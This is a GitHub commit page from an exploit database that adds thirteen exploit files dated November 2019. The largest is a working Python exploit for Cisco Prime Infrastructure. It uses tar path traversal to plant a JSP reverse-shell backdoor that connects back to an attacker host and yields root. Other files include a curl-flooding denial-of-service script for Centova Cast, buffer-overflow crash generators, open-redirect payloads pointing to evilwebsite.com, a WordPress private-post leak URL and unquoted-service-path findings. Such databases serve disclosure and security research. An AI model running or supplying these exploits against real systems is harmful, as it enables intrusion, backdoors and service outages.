Skip to content

Commit 72cddae

Browse files
author
Offensive Security
committed
DB: 2019-11-20
13 changes to exploits/shellcodes ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) Centova Cast 3.2.12 - Denial of Service (PoC) scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable' Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution Apache Httpd mod_proxy - Error Page Cross-Site Scripting Apache Httpd mod_rewrite - Open Redirects WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
1 parent 3e9ff5a commit 72cddae

14 files changed

Lines changed: 611 additions & 0 deletions

File tree

exploits/hardware/dos/47677.sh

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
2+
# Date: 2019-11-18
3+
# Exploit Author: DroidU
4+
# Vendor Homepage: https://centova.com
5+
# Affected Version: <=v3.2.12
6+
# Tested on: Debian 9, CentOS 7
7+
# ===============================================
8+
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
9+
10+
#!/bin/bash
11+
if [ "$3" = "" ]
12+
then
13+
echo "Usage: $0 centovacast_url reseller/admin password"
14+
exit
15+
fi
16+
url=$1
17+
reseller=$2
18+
pass=$3
19+
20+
21+
dwn() {
22+
echo -n .
23+
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
24+
}
25+
26+
for i in {0..32}
27+
do
28+
dwn /dev/zero
29+
sleep .1
30+
done
31+
echo "
32+
Done!"

exploits/ios/dos/47678.py

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
2+
# Discovery by: Luis Martinez
3+
# Discovery Date: 2019-11-18
4+
# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
5+
# Software Link: App Store for iOS devices
6+
# Tested Version: 1.1.4.0
7+
# Vulnerability Type: Denial of Service (DoS) Local
8+
# Tested on OS: iPhone 7 iOS 13.2
9+
10+
# Steps to Produce the Crash:
11+
# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
12+
# 2.- Copy content to clipboard
13+
# 3.- Open "scadaApp for iOS"
14+
# 4.- Let's go
15+
# 5.- Username > "l4m5"
16+
# 6.- Password > "l4m5"
17+
# 7.- Paste ClipBoard on "Servername"
18+
# 8.- Login
19+
# 9.- Crashed
20+
21+
#!/usr/bin/env python
22+
23+
buffer = "\x41" * 257
24+
print (buffer)

exploits/linux/remote/47686.py

Lines changed: 172 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,172 @@
1+
#!/usr/bin/python
2+
3+
"""
4+
Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
5+
Steven Seeley (mr_me) of Source Incite - 2019
6+
SRC: SRC-2019-0034
7+
CVE: CVE-2019-1821
8+
9+
Example:
10+
========
11+
12+
saturn:~ mr_me$ ./poc.py
13+
(+) usage: ./poc.py <target> <connectback:port>
14+
(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
15+
16+
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
17+
(+) planted backdoor!
18+
(+) starting handler on port 4444
19+
(+) connection from 192.168.100.123
20+
(+) pop thy shell!
21+
python -c 'import pty; pty.spawn("/bin/bash")'
22+
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
23+
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
24+
sh-4.1# /usr/bin/id
25+
/usr/bin/id
26+
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
27+
sh-4.1# exit
28+
exit
29+
exit
30+
[prime@piconsole CSCOlumos]$ exit
31+
exit
32+
exit
33+
"""
34+
35+
import sys
36+
import socket
37+
import requests
38+
import tarfile
39+
import telnetlib
40+
from threading import Thread
41+
from cStringIO import StringIO
42+
from requests.packages.urllib3.exceptions import InsecureRequestWarning
43+
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
44+
45+
def _build_tar(ls, lp):
46+
"""
47+
build the tar archive without touching disk
48+
"""
49+
f = StringIO()
50+
b = _get_jsp(ls, lp)
51+
t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")
52+
t.size = len(b)
53+
with tarfile.open(fileobj=f, mode="w") as tar:
54+
tar.addfile(t, StringIO(b))
55+
return f.getvalue()
56+
57+
def _get_jsp(ls, lp):
58+
jsp = """<%@page import="java.lang.*"%>
59+
<%@page import="java.util.*"%>
60+
<%@page import="java.io.*"%>
61+
<%@page import="java.net.*"%>
62+
<%
63+
class StreamConnector extends Thread
64+
{
65+
InputStream sv;
66+
OutputStream tp;
67+
StreamConnector( InputStream sv, OutputStream tp )
68+
{
69+
this.sv = sv;
70+
this.tp = tp;
71+
}
72+
public void run()
73+
{
74+
BufferedReader za = null;
75+
BufferedWriter hjr = null;
76+
try
77+
{
78+
za = new BufferedReader( new InputStreamReader( this.sv ) );
79+
hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );
80+
char buffer[] = new char[8192];
81+
int length;
82+
while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )
83+
{
84+
hjr.write( buffer, 0, length );
85+
hjr.flush();
86+
}
87+
} catch( Exception e ){}
88+
try
89+
{
90+
if( za != null )
91+
za.close();
92+
if( hjr != null )
93+
hjr.close();
94+
} catch( Exception e ){}
95+
}
96+
}
97+
try
98+
{
99+
String ShellPath = new String("/bin/sh");
100+
Socket socket = new Socket("__IP__", __PORT__);
101+
Process process = Runtime.getRuntime().exec( ShellPath );
102+
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
103+
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
104+
} catch( Exception e ) {}
105+
%>"""
106+
return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))
107+
108+
def handler(lp):
109+
"""
110+
This is the client handler, to catch the connectback
111+
"""
112+
print "(+) starting handler on port %d" % lp
113+
t = telnetlib.Telnet()
114+
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
115+
s.bind(("0.0.0.0", lp))
116+
s.listen(1)
117+
conn, addr = s.accept()
118+
print "(+) connection from %s" % addr[0]
119+
t.sock = conn
120+
print "(+) pop thy shell!"
121+
t.interact()
122+
123+
def exec_code(t, lp):
124+
"""
125+
This function threads the client handler and sends off the attacking payload
126+
"""
127+
handlerthr = Thread(target=handler, args=(lp,))
128+
handlerthr.start()
129+
r = requests.get("https://%s/si.jsp" % t, verify=False)
130+
131+
def we_can_upload(t, ls, lp):
132+
"""
133+
This is where we take advantage of the vulnerability
134+
"""
135+
td = _build_tar(ls, lp)
136+
bd = {'files': ('si.tar', td)}
137+
h = {
138+
'Destination-Dir': 'tftpRoot',
139+
'Compressed-Archive': "false",
140+
'Primary-IP' : '127.0.0.1',
141+
'Filecount' : "1",
142+
'Filename': "si.tar",
143+
'Filesize' : str(len(td)),
144+
}
145+
r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)
146+
if r.status_code == 200:
147+
return True
148+
return False
149+
150+
def main():
151+
if len(sys.argv) != 3:
152+
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
153+
print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]
154+
sys.exit(-1)
155+
t = sys.argv[1]
156+
cb = sys.argv[2]
157+
if not ":" in cb:
158+
print "(+) using default connectback port 4444"
159+
ls = cb
160+
lp = 4444
161+
else:
162+
if not cb.split(":")[1].isdigit():
163+
print "(-) %s is not a port number!" % cb.split(":")[1]
164+
sys.exit(-1)
165+
ls = cb.split(":")[0]
166+
lp = int(cb.split(":")[1])
167+
if we_can_upload(t, ls, lp):
168+
print "(+) planted backdoor!"
169+
exec_code(t, lp)
170+
171+
if __name__ == '__main__':
172+
main()

exploits/multiple/webapps/47688.md

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
The trick is to use a vertical tab (`%09`) and then place another URL in the tag. So once a victim clicks the link on the error page, she will go somewhere else.
2+
3+
As you can see, the browser changes the destination from relative / to an absolute url https://enoflag.de. The exploit is `http://domain.tld/%09//otherdomain.tld`
4+
5+
Here's the httpd configuration to reproduce the behavior:
6+
7+
```
8+
<Location />
9+
ProxyPass http://127.0.0.1:9000/ connectiontimeout=1 timeout=2
10+
ProxyPassReverse http://127.0.0.1:9000/
11+
Order allow,deny
12+
Allow from all
13+
</Location>
14+
```

exploits/multiple/webapps/47689.md

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):
2+
3+
```
4+
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
5+
HTTP/2 302
6+
date: Mon, 28 Oct 2019 03:36:58 GMT
7+
content-type: text/html; charset=iso-8859-1
8+
location: https://redirect.local.evilwebsite.com
9+
```

exploits/multiple/webapps/47690.md

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
2+
3+
Here are a few ways to manipulate the returned entries:
4+
5+
- `order` with `asc` or `desc`
6+
- `orderby`
7+
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
8+
9+
10+
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:

exploits/windows/dos/47674.py

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
2+
# Discovery by: Diego Buztamante
3+
# Discovery Date: 2019-11-18
4+
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
5+
# Software Link : http://download.netscantools.com/ipls192.zip
6+
# Tested Version: 1.92
7+
# Vulnerability Type: Denial of Service (DoS) Local
8+
# Tested on OS: Windows 10 Pro x64 es
9+
10+
# Steps to Produce the Crash:
11+
# 1.- Run python code : python ipPulse_1.92.py
12+
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
13+
# 3.- Open ippulse.exe
14+
# 4.- Click on "Enter Key"
15+
# 5.- Paste ClipBoard on "Name: "
16+
# 6.- OK
17+
# 7.- Crashed
18+
19+
#!/usr/bin/env python
20+
21+
buffer = "\x41" * 256
22+
f = open ("ipPulse_1.92.txt", "w")
23+
f.write(buffer)
24+
f.close()

exploits/windows/dos/47679.py

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
2+
#Exploit Author : ZwX
3+
#Exploit Date: 2019-11-18
4+
#Vendor Homepage : https://www.xmedia-recode.de/
5+
#Link Software : https://www.xmedia-recode.de/download.php
6+
#Tested on OS: Windows 7
7+
#Social: twitter.com/ZwX2a
8+
#contact: msk4@live.fr
9+
10+
'''
11+
Proof of Concept (PoC):
12+
=======================
13+
14+
1.Download and install XMedia Recode
15+
2.Run the python operating script that will create a file (poc.m3u)
16+
3.Run the software "File -> Open File -> Add the file (.m3u) "
17+
4.XMedia Recode Crashed
18+
'''
19+
20+
#!/usr/bin/python
21+
22+
http = "http://"
23+
buffer = "\x41" * 500
24+
25+
poc = http + buffer
26+
file = open("poc.m3u,"w")
27+
file.write(poc)
28+
file.close()
29+
30+
print "POC Created by ZwX"

exploits/windows/local/47675.txt

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
2+
#Exploit Author : ZwX
3+
#Exploit Date: 2019-11-18
4+
#Vendor Homepage : https://www.filehorse.com/
5+
#Link Software : https://www.filehorse.com/download-bartvpn/
6+
#Tested on OS: Windows 7
7+
8+
9+
#Analyze PoC :
10+
==============
11+
12+
13+
C:\Users\ZwX>sc qc BartVPNService
14+
[SC] QueryServiceConfig réussite(s)
15+
16+
SERVICE_NAME: BartVPNService
17+
TYPE : 110 WIN32_OWN_PROCESS (interactive)
18+
START_TYPE : 2 AUTO_START
19+
ERROR_CONTROL : 1 NORMAL
20+
BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
21+
LOAD_ORDER_GROUP :
22+
TAG : 0
23+
DISPLAY_NAME : BartVPNService
24+
DEPENDENCIES :
25+
SERVICE_START_NAME : LocalSystem

exploits/windows/local/47676.txt

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
2+
# Discovery by: Luis Martinez
3+
# Discovery Date: 2019-11-18
4+
# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
5+
# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
6+
# Rockwell Automation Technologies
7+
# Tested Version: 30.01.00
8+
# Vulnerability Type: Unquoted Service Path
9+
# Tested on OS: Windows 10 Pro x64 es
10+
11+
# Step to discover Unquoted Service Path:
12+
13+
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """
14+
15+
FactoryTalk Activation Service FactoryTalk Activation Service C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe Auto
16+
17+
# Service info:
18+
19+
C:\>sc qc "FactoryTalk Activation Service"
20+
[SC] QueryServiceConfig SUCCESS
21+
22+
SERVICE_NAME: FactoryTalk Activation Service
23+
TYPE : 10 WIN32_OWN_PROCESS
24+
START_TYPE : 2 AUTO_START
25+
ERROR_CONTROL : 1 NORMAL
26+
BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
27+
LOAD_ORDER_GROUP :
28+
TAG : 0
29+
DISPLAY_NAME : FactoryTalk Activation Service
30+
DEPENDENCIES : winmgmt
31+
: wmiapsrv
32+
: +NetworkProvider
33+
SERVICE_START_NAME : LocalSystem
34+
35+
#Exploit:
36+
37+
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

0 commit comments

Comments
 (0)